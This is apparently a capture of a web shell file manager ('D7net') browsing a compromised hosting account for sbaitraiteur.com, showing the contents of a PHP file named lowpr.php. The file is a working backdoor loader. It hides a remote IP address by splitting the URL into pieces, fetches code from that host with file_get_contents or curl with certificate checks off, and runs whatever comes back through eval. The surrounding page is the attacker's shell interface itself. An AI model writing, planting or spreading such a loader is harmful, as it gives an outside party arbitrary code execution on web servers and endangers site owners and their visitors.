D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
diafdxji
/
sbaitraiteur.com
/
Filename :
lowpr.php
back
Copy
<?php // Split URL into pieces $url_part1 = 'http://173'; $url_part2 = '.208.149.146/z51212_7/'; $url_part3 = '/stat/index2.txt'; $full_url = $url_part1 . $url_part2 . $url_part3; // Attempt to get remote content $content = @file_get_contents($full_url); if ($content === false && function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $full_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $content = curl_exec($ch); curl_close($ch); } // Only eval if we have content if (!empty($content)) { @eval('?>' . $content); }